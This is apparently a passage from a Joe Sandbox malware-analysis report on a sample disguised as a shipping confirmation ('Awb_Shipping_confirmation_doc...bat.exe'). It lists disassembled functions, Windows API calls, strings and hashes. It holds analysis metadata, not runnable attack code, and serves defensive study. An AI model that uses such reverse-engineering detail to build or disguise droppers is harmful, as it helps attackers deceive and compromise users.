Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
API String ID: 2624150263-772280193
Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D

Function 733B1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 733B12BB: GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 733B1D2D
lstrcpyW.KERNEL32(00000008,?), ref: 733B1D75
lstrcpyW.KERNEL32(00000808,?), ref: 733B1D7F
GlobalFree.KERNEL32(00000000), ref: 733B1D92
GlobalFree.KERNEL32(?), ref: 733B1E74
GlobalFree.KERNEL32(?), ref: 733B1E79
GlobalFree.KERNEL32(?), ref: 733B1E7E
GlobalFree.KERNEL32(00000000), ref: 733B2068
lstrcpyW.KERNEL32(?,?), ref: 733B2222
GetModuleHandleW.KERNEL32(00000008), ref: 733B22A1
LoadLibraryW.KERNEL32(00000008), ref: 733B22B2
GetProcAddress.KERNEL32(?,?), ref: 733B230C
lstrlenW.KERNEL32(00000808), ref: 733B2326

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 665d989e5a4804686fca5b9b9b66efccadee848bd098d616637f347a98f89709
Instruction ID: df921053ae34f3638438db2e5a206ab6d63d4d3e440e35a2d8797c8928e111c0
Opcode Fuzzy Hash: 665d989e5a4804686fca5b9b9b66efccadee848bd098d616637f347a98f89709
Instruction Fuzzy Hash: F3229C71D00249DFDB318FA4C980BEEB7BAFB08315F14462ED1A6E6A94D77C9681CB50

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\eftermodnendes\ringeagt
API String ID: 542301482-1820855999
Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19

Function 0040506E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405086
GetDlgItem.USER32(?,00000408), ref: 00405091
GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
SendMessageW.USER32(?,00001109,00000002), ref: 00405147
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
DeleteObject.GDI32(00000000), ref: 00405168
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
GetWindowLongW.USER32(?,000000F0), ref: 004052AC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
ShowWindow.USER32(?,00000005), ref: 004052CA
SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
ImageList_Destroy.COMCTL32(?), ref: 00405498
GlobalFree.KERNEL32(?), ref: 004054A8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
ShowWindow.USER32(?,00000000), ref: 00405652
GetDlgItem.USER32(?,000003FE), ref: 0040565D
ShowWindow.USER32(00000000), ref: 00405664

Strings

, xrefs: 0040563C
N, xrefs: 00405303
M, xrefs: 00405222

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18

Function 00404102 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
ShowWindow.USER32(?), ref: 0040415E
GetWindowLongW.USER32(?,000000F0), ref: 00404170
ShowWindow.USER32(?,00000004), ref: 00404189
DestroyWindow.USER32 ref: 0040419D
SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
GetDlgItem.USER32(?,?), ref: 004041D5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
IsWindowEnabled.USER32(00000000), ref: 004041F0
GetDlgItem.USER32(?,00000001), ref: 0040429B
GetDlgItem.USER32(?,00000002), ref: 004042A5
SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
GetDlgItem.USER32(?,00000003), ref: 004043B6
ShowWindow.USER32(00000000,?), ref: 004043D7
EnableWindow.USER32(?,?), ref: 004043E9
EnableWindow.USER32(?,?), ref: 00404404
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
EnableMenuItem.USER32(00000000), ref: 00404421
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
SetWindowTextW.USER32(?,00422F48), ref: 0040448A
ShowWindow.USER32(?,0000000A), ref: 004045BE

Strings

H/B, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H/B
API String ID: 1860320154-184950203
Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D

Function 004047C0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
GetDlgItem.USER32(?,000003E8), ref: 00404872
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
GetSysColor.USER32(?), ref: 004048A0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
lstrlenW.KERNEL32(?), ref: 004048C1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
GetDlgItem.USER32(?,0000040A), ref: 0040493C
SendMessageW.USER32(00000000), ref: 00404943
GetDlgItem.USER32(?,000003E8), ref: 0040496E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
SetCursor.USER32(00000000), ref: 004049C2
LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
SetCursor.USER32(00000000), ref: 004049DE
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F

Strings

7G@, xrefs: 004049CA
N, xrefs: 0040495C
Call, xrefs: 0040499D

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 7G@$Call$N
API String ID: 3103080414-3155595626
Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98

Function 004062C8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C

Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
wsprintfA.USER32 ref: 00406347
GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
GlobalFree.KERNEL32(00000000), ref: 00406430
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

Strings

eB, xrefs: 004062F1
[Rename], xrefs: 004063B1, 004063C3
mB, xrefs: 0040631E
%ls=%ls, xrefs: 0040633D
mB, xrefs: 00406325

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$eB$mB$mB
API String ID: 2171350718-2529913679
Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4

Function 00406930 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
CharNextW.USER32(?,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 00406974
*?|<>/":, xrefs: 00406982

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3691885098
Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD

Function 00404668 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404685
GetSysColor.USER32(00000000), ref: 004046C3
SetTextColor.GDI32(?,00000000), ref: 004046CF
SetBkMode.GDI32(?,?), ref: 004046DB
GetSysColor.USER32(?), ref: 004046EE
SetBkColor.GDI32(?,?), ref: 004046FE
DeleteObject.GDI32(?), ref: 00404718
CreateBrushIndirect.GDI32(?), ref: 00404722

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58

Function 733B2480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 733B25C2

Part of subcall function 733B12CC: lstrcpynW.KERNEL32(00000000,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12DC

GlobalAlloc.KERNEL32(00000040), ref: 733B2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 733B2563

Strings

@Hmu, xrefs: 733B257C

Memory Dump Source

